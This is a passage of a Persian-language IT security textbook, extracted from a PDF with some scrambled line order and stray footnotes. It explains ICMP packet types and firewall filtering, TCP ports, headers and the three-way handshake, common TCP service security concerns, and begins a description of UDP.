ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ pingﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﭘﮋﻭﺍﻙ ICMP ٢٨٦ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﻭﺍﻛﻨﺶ ﺑﻪ ﻳﻚ ﺑﺴﺘﺔ
ﻻ ﻳﻚ ﭘﺎﺳﺦ ﭘﮋﻭﺍﻙ ICMPﺍﺳﺖ ﻭ ﻳﺎ ﻳﻚ ﭘﻴﺎﻡ ICMPﻣﺒﺘﻨﻲ ﺑﺮ ﻏﻴﺮﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻮﺩﻥ ﻣﻘﺼﺪ. ﭘﮋﻭﺍﻙ ﻣﻌﻤﻮ ﹰ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺳﺮﺁﻳﻨﺪ ) IPﺁﺩﺭﺳﻬﺎﻱ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺑﺴﺘﻪ( ،ﻫﺮ ﺑﺴﺘﺔ ICMPﻳﻚ ﺳﺮﺁﻳﻨﺪ ICMPﻧﻴﺰ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻣﻘﺪﺍﺭ ٨ﺑﻴﺘﻲ
ﻣﺸﺨﺺﻛﻨﻨﺪﺓ ﻧﻮﻉ ﺑﺴﺘﻪ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ICMPﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﻮﻧﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻤﭽﻨﺎﻥ ﺩﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ TCP/IPﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﮔﺎﻫﻲ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﺩﻗﻴﻘﺘﺮ
ﺑﮕﻮﻳﻴﻢ ،ﺑﺴﺘﻪﻫﺎﻱ ﻧﻮﻉ ) ٣ﺍﻋﻼﻡ ﻏﻴﺮﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻮﺩﻥ ﻣﻘﺼﺪ( ،ﻧﻮﻉ ) ٤ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﻣﺒﺪﺃ( ،ﻭ ﻧﻮﻉ ) ٥ﻫﺪﺍﻳﺖ ﻣﺠﺪﺩ( ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻪ
ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ،ﭼﻮﻥ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻦ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ICMPﺑﻔﺮﺳﺘﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﻫﺪﺍﻳﺖ
ﻛﻨﺪ ﻭ ﻳﺎ ﺁﻏﺎﺯﮔﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﺷﺪ .ﻫﺮﭼﻨﺪ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺴﺘﻘﻴﻢ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺪﺍﺭﻧﺪ ،ﺍﻣﺎ ﻧﮕﺎﺭﺷﻬﺎﻱ
ﻻ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻳﻜﺴﺎﻧﻲ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻱ ﭘﺎﺳﺨﻬﺎ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﻮﻉ ﻣﺘﻔﺎﻭﺕ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻌﻤﻮ ﹰ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ
ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺪﻭﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻫﻴﭻ ﻣﺸﻜﻞ ﺟﺎﻧﺒﻲ، ﺑﻴﺸﺘﺮ ﺍﻧﻮﺍﻉ ﺑﺴﺘﻪﻫﺎﻱ ICMPﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻣﻌﻤﻮ ﹰ
ﻣﺴﻴﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ICMPﺍﺯ ﺍﻧﻮﺍﻉ ) ١٣ ،٥ﺩﺭﺧﻮﺍﺳﺖ ﻣﻬﺮ ﺯﻣﺎﻥ) ١٤ ،(٢٨٧ﭘﺎﺳﺦ ﻣﻬﺮ ﺯﻣﺎﻥ() ١٧ ،ﺩﺭﺧﻮﺍﺳﺖ ،(address maskﻭ ) ١٨ﭘﺎﺳﺦ
،(address maskﻭ ﻧﻴﺰ ﺑﺴﺘﻪﻫﺎﻱ ﺧﺮﻭﺟﻲ ICMPﺍﺯ ﺍﻧﻮﺍﻉ ) ١١ ،٥ﺍﺗﻤﺎﻡ ﻭﻗﺖ() ١٢ ،ﻣﺸﻜﻞ ﺁﺭﮔﻮﻣﺎﻥ( ،١٧ ،١٤ ،١٣ ،ﻭ ١٨ﺭﺍ ﺑﺒﻨﺪﻳﺪ.
TCP
TCPﻳﻚ ﺟﺮﻳﺎﻥ ﺍﻧﺘﻘﺎﻝ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ،ﺑﺎ ﺣﻔﻆ ﺗﺮﺗﻴﺐ ﻭ ﺩﻭﻃﺮﻓﻪ ﻣﻴﺎﻥ ﺩﻭ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻭﺍﺣﺪ ﻳﺎ ﺩﻭ ﺭﺍﻳﺎﻧﺔ ﻣﺨﺘﻠﻒ ﺑﻪ
ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩﺍﻧﺪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ" .ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ" ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﺷﻮﺩ ﻫﺮ ﺑﺎﻳﺖ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺣﺘﻤﹰﺎ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﻣﻲﺭﺳﺪ
)ﻭ ﺩﺭﺻﻮﺭﺕ ﻋﺪﻡ ﻣﻮﻓﻘﻴﺖ ﻧﻴﺰ ﺣﺘﻤﹰﺎ ﺷﻤﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﻣﻲﺷﻮﻳﺪ( ،ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﺑﺎﻳﺘﻬﺎ ﺩﺭ ﻣﻘﺼﺪ ﺑﻪ ﻫﻤﺎﻥ ﺗﺮﺗﻴﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﮔﺮﺩﻧﺪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ
ﺷﺪﻩﺍﻧﺪ .ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻗﻄﻊ ﺷﻮﺩ ،ﺑﺎﻳﺘﻬﺎﻱ ﻣﻨﺘﻘﻞﻧﺸﺪﻩ ﺑﻪ ﻣﻘﺼﺪ ﻧﺨﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ ،ﻣﮕﺮ ﺁﻧﻜﻪ ﻳﻚ ﻣﺴﻴﺮ
ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ﺁﻥ ﻣﻘﺼﺪ ﭘﻴﺪﺍ ﺷﻮﺩ .ﺩﺭ ﭼﻨﻴﻦ ﺣﺎﻟﺘﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ TCPﺑﺎﻳﺪ ﺑﻪ ﭘﺮﺩﺍﺯﺓ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﻩ ﻳﻚ ﭘﻴﻐﺎﻡ ﺧﻄﺎ
ﺩﻫﺪ ،ﻧﻪ ﺍﻳﻨﻜﻪ ﻭﺍﻧﻤﻮﺩ ﻛﻨﺪ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﻫﻨﻮﺯ ﺍﺯ ﻛﺎﺭﺍﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ.
ﻫﺮ ﺍﺗﺼﺎﻝ TCPﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭ ﺳﺮ ﺧﻮﺩ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻭ ﭘﻮﺭﺗﻬﺎ ﺑﺎ ﺷﻤﺎﺭﻩﻫﺎﻱ ١٦ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ
ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﭘﺮﻭﺗﻜﻞ ،TCPﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺍﺯ ﻫﻤﺎﻥ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲ
ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ،ﻭ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺍﺗﺼﺎﻻﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻣﻌﻴﻦ ﻣﻲﺷﻮﺩ .ﺑﻌﻀﻲ ﺷﻤﺎﺭﻩ ﭘﻮﺭﺗﻬﺎﻱ
ﻣﻌﺮﻭﻑ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﭘﻮﺭﺕ ٨٠ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ HTTPﻭ ﭘﻮﺭﺕ ٢٥ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ .SMTP
ﺩﺭ ﺭﻭﻱ ﺳﻴﻢ ،ﺑﺴﺘﻪﻫﺎﻱ TCPﻫﻤﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ IPﻫﺴﺘﻨﺪ ﻛﻪ ﻳﻚ ﺳﺮﺁﻳﻨﺪ TCPﺑﻪ ﺁﻧﻬﺎ ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺳﺮﺁﻳﻨﺪ ﺷﺎﻣﻞ ﭼﻨﺪ
ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮ ﻧﻴﺰ ﻫﺴﺖ ،ﺍﺯ ﺟﻤﻠﻪ:
ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ TCPﻣﺒﺪﺃ ﺑﺴﺘﻪ، •
ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕ TCPﻣﻘﺼﺪ ﺑﺴﺘﻪ، •
ﺍﻃﻼﻋﺎﺕ ﺭﺩﻳﻒ ،ﺑﻄﻮﺭﻳﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺑﺘﻮﺍﻧﺪ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻣﻮﻗﻌﻴﺖ ﺩﺭﺳﺖ ﺧﻮﺩ ﺩﺭ ﺭﺷﺘﺔ TCPﻗﺮﺍﺭ ﺩﻫﺪ، •
٢٨٨
ﺍﻃﻼﻋﺎﺕ ﻛﻨﺘﺮﻝ ﺟﺮﻳﺎﻥ ،ﻛﻪ ﺑﻪ ﮔﻴﺮﻧﺪﻩ ﺍﻃﻼﻉ ﻣﻲﺩﻫﺪ ﻓﺮﺳﺘﻨﺪﺓ ﺑﺴﺘﻪ ﭼﻨﺪ ﺑﺎﻳﺖ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ،ﻭ •
ﺳﺮﺟﻤﻊ.TCP ٢٨٩ •
ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ،ﻫﺮ ﺍﺗﺼﺎﻝ IPv4ﺍﺯ ﻧﻮﻉ TCPﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺩﻭ ﻋﺪﺩ ٣٢ﺑﻴﺘﻲ ﻭ ﺩﻭ ﻋﺪﺩ ١٦ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻛﺮﺩ:
ﭘﺮﻭﺗﻜﻞ TCPﺍﺯ ﺩﻭ ﺑﻴﺖ ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﺮﺁﻳﺪ ﺑﺴﺘﻪ ﺑﻪ ﻧﺎﻣﻬﺎﻱ SYNﻭ ACKﺑﻤﻨﻈﻮﺭ ﺍﺭﺳﺎﻝ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺗﺼﺎﻟﻬﺎﻱ ﺟﺪﻳﺪ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ،TCPﻣﻴﺰﺑﺎﻥ ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﻳﻚ ﺑﺴﺘﻪ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻓﺮﺳﺘﺪ ﻛﻪ ﺩﺭ
ﺁﻥ ﺑﻴﺖ SYNﻣﻘﺪﺍﺭ ١ﻭ ﺑﻴﺖ ACKﻣﻘﺪﺍﺭ ٠ﺭﺍ ﺩﺍﺭﺩ .ﭘﺲ ﺍﺯ ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺎ ﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺴﺘﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮ
ﺩﻭ ﺑﻴﺖ SYNﻭ ACKﻣﻘﺪﺍﺭ ١ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ؛ ﻭ ﺩﺭ ﭘﺎﻳﺎﻥ ﻧﻴﺰ ﻣﻴﺰﺑﺎﻥ ﺍﻭﻝ ﻳﻚ ﺑﺴﺘﺔ ﺳﻮﻡ ﻣﻲﻓﺮﺳﺘﺪ ﻛﻪ ﺩﺭ ﺁﻥ
287 Timestamp
۲۸۸ﺑﻪ ﺍﻳﻦ ﻋﺪﺩ "ﭘﻨﺠﺮﺓ "TCPﻣﻲﮔﻮﻳﻨﺪ.
289 Checksum
٣٩٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﻴﺖ ACKﻣﻘﺪﺍﺭ ١ﻭﻟﻲ ﺑﻴﺖ SYNﻣﻘﺪﺍﺭ ٠ﺩﺍﺭﺩ .ﺑﻪ ﺍﻳﻦ ﺭﻭﻧﺪ ،ﺩﺳﺖ ﺩﺍﺩﻥ ﺳﻪﻣﺮﺣﻠﻪﺍﻱ ٢٩٠TCPﻣﻲﮔﻮﻳﻨﺪ .ﺑﺎ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ
ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺮﺁﻳﻨﺪ ﺁﻧﻬﺎ ﺑﻴﺖ SYNﻣﻘﺪﺍﺭ ﺩﺍﺭﺩ ﻭﻟﻲ ACKﻣﻘﺪﺍﺭ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻥ ﺑﺴﺘﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺍﺗﺼﺎﻝ ﺟﺪﻳﺪ ﺭﺍ
ﺍﺯ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﺗﺼﺎﻻﺕ ﺍﺯ ﻗﺒﻞ ﺍﻳﺠﺎﺩﺷﺪﻩ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﺸﺨﻴﺺ ﺩﺍﺩ .ﺍﻳﻦ ﺗﻔﺎﻭﺕ ﻫﻨﮕﺎﻡ ﺳﺎﺧﺘﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ
ﻏﺮﺑﺎﻝﻛﻨﻨﺪﺓ ﺑﺴﺘﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ.
TCPﺩﺭ ﺑﻴﺸﺘﺮ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﻧﺘﻘﺎﻝ ﭘﺎﻳﺪﺍﺭ ﻭ ﻫﻤﮕﺎﻡ ﻳﻚ ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩ ﺩﺭ ﻳﻚ ﻳﺎ ﺩﻭ ﺟﻬﺖ ﺩﺍﺭﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺑﻌﻨﻮﺍﻥ
ﻣﺜﺎﻝ TCPﺩﺭ ﭘﺮﻭﺗﻜﻞ ،HTTPﺧﺪﻣﺎﺕ ﭘﺎﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ،ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ،ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺳﺘﻮﺭﺍﺕ ﺑﻪ
ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ X-Windowsﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﺟﺪﻭﻝ -٥ﺍﻟﻒ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻨﺘﺴﺐ ﺑﻪ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺧﺪﻣﺎﺕ
ﻣﻌﻤﻮﻝ TCPﺁﻣﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ،ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺰﺭﮒ ﻭ ﺿﻌﻔﻬﺎﻱ ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﺸﻒ ﺷﺪﻩ ،ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ
ﻫﺮﻳﻚ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺳﺘﻪﺑﻨﺪﻱ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﺪﻣﺎﺕ TCPﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﺍﺳﺖ:
ﻣﻲﺗﻮﺍﻥ ﺳﺮﻭﻳﺲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻭ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩ؛ ﺍﻟﻒ.
ﭘﺮﻭﺗﻜﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ )ﺗﺤﺖ (IPv4؛ ﺏ.
ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺎﺩﺭﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ،SMTPﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ،CGIﻭ proxyﻫﺎ ،ﻳﻜﻲ ﺍﺯ ﻋﻮﺍﻣﻞ ﺍﺻﻠﻲ ﭘﺨﺶ ﻣﺠﺪﺩ ﺝ.
emailﻫﺎﻱ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ؛ ﻭ
ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ IPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻣﻌﺮﺽ ﺗﻬﺪﻳﺪ ﺳﺮﻭﻳﺲ ﻣﻌﻤﻮ ﹰ ﺩ.
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻭ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﺎﺑﻪ ﺣﻤﻼﺕ ﻣﻲﺑﺎﺷﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
UDP
UDPﺳﻴﺴﺘﻤﻲ ﺳﺎﺩﻩ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺩﺍﺩﻩ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﻣﺸﺎﺑﻪ ﻳﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺭﺍﺋﻪ
ﻣﻲﺩﻫﺪ" .ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ" ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨﺪ ﻫﺮ ﺑﺴﺘﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺣﺘﻤﹰﺎ ﺩﺭ ﻣﻘﺼﺪ ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ
ﺷﻮﺩ ،ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻫﻤﺎﻥ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ؛ ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ UDPﺑﻬﺘﺮﻳﻦ ﺗﻼﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺭﺳﺎﻧﺪﻥ
ﻻ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﻳﻚ ﻣﺴﻴﺮ ﺧﻠﻮﺕ UDP ،ﻧﺰﺩﻳﻚ ﺑﻪ %١٠٠ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ .ﻣﻌﻤﻮ ﹰ
ﻣﻲﺭﺳﺎﻧﺪ .ﻣﺰﻳﺖ ،UDPﺳﺮﺑﺎﺭ ٢٩١ﻛﻤﺘﺮ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ TCPﺍﺳﺖ -ﺍﻳﻦ ﺳﺮﺑﺎﺭ ﻛﻤﺘﺮ ﺑﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ UDPﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ
291 Overhead
٣٩٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ١٠ﺑﺮﺍﺑﺮ TCPﺩﺭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻬﺮﻩﻭﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ UDP .ﺩﺭ ﺩﺭﺟﺔ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﺔ (NIS) SUNﻭ
